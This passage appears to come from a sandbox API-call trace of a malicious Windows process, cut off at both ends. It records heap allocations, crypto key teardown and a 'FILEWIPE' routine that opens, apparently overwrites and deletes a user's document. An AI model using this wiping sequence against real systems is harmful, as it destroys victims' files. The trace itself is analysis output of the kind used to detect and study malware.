Flags=0x0, Size=0x8) returned 0x9c2708 [0179.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.388] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0179.388] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0179.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0179.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0179.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0179.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0179.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0179.389] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.389] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0179.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0179.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.389] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0179.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0179.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0179.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0179.389] CryptDestroyKey (hKey=0x90af18) returned 1 [0179.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0179.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0179.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0179.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0179.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0179.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0179.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0179.389] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0179.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0179.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0179.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0179.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0179.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0179.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0179.390] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0179.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0179.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0179.390] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0179.390] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0179.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0179.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.390] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0179.390] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0179.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0179.390] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0179.390] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0179.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0179.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.390] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.390] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0179.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0179.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0179.390] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0179.390] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0179.390] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0179.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0179.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0179.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0179.391] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0179.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.391] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0179.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0179.391] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0179.391] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0179.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.391] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0179.391] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0179.391] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.391] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0179.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.391] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.391] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0179.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0179.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0179.391] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0179.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0179.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0179.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.392] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.392] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0179.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0179.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0179.392] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0179.392] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0179.392] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.392] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0179.392] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.392] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.392] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0179.392] FreeLibrary (hLibModule=0x74f20000) returned 1 [0179.392] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.392] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.392] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.392] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.394] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.397] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.397] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0179.397] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.409] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.409] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c77ab30, ftCreationTime.dwHighDateTime=0x1d5dfc3, ftLastAccessTime.dwLowDateTime=0x99fe6ad0, ftLastAccessTime.dwHighDateTime=0x1d5d97b, ftLastWriteTime.dwLowDateTime=0x99fe6ad0, ftLastWriteTime.dwHighDateTime=0x1d5d97b, nFileSizeHigh=0x0, nFileSizeLow=0xa8f4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="T8zO.ots", cAlternateFileName="")) returned 0x90ae18 [0179.409] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0179.409] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.409] CharLowerBuffW (in: lpsz="byte[43252]", cchLength=0xb | out: lpsz="byte[43252]") returned 0xb [0179.410] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.410] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0179.410] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.410] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0179.410] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0179.411] FreeLibrary (hLibModule=0x75c90000) returned 1 [0179.411] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.411] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.411] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.411] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0179.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.412] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0179.412] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.412] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\t8zo.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0179.412] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.412] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.412] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.412] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.412] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0179.412] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.412] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.412] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.413] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.413] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.413] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.413] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.413] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.413] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0179.413] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.413] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.413] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.413] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.413] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.413] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.413] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.413] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots", lpFilePart=0x0) returned 0x51 [0179.414] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c77ab30, ftCreationTime.dwHighDateTime=0x1d5dfc3, ftLastAccessTime.dwLowDateTime=0x99fe6ad0, ftLastAccessTime.dwHighDateTime=0x1d5d97b, ftLastWriteTime.dwLowDateTime=0x103660c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa8f4, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="T8zO.ots", cAlternateFileName="")) returned 0x90ae18 [0179.415] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\t8zo.ots")) returned 1 [0179.417] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c77ab30, ftCreationTime.dwHighDateTime=0x1d5dfc3, ftLastAccessTime.dwLowDateTime=0x99fe6ad0, ftLastAccessTime.dwHighDateTime=0x1d5d97b, ftLastWriteTime.dwLowDateTime=0x103660c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa8f4, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="T8zO.ots", cAlternateFileName="")) returned 0 [0179.417] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0179.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0179.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0179.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6d90 | out: hHeap=0x8a0000) returned 1 [0179.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0179.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0179.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0179.417] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0179.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0179.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 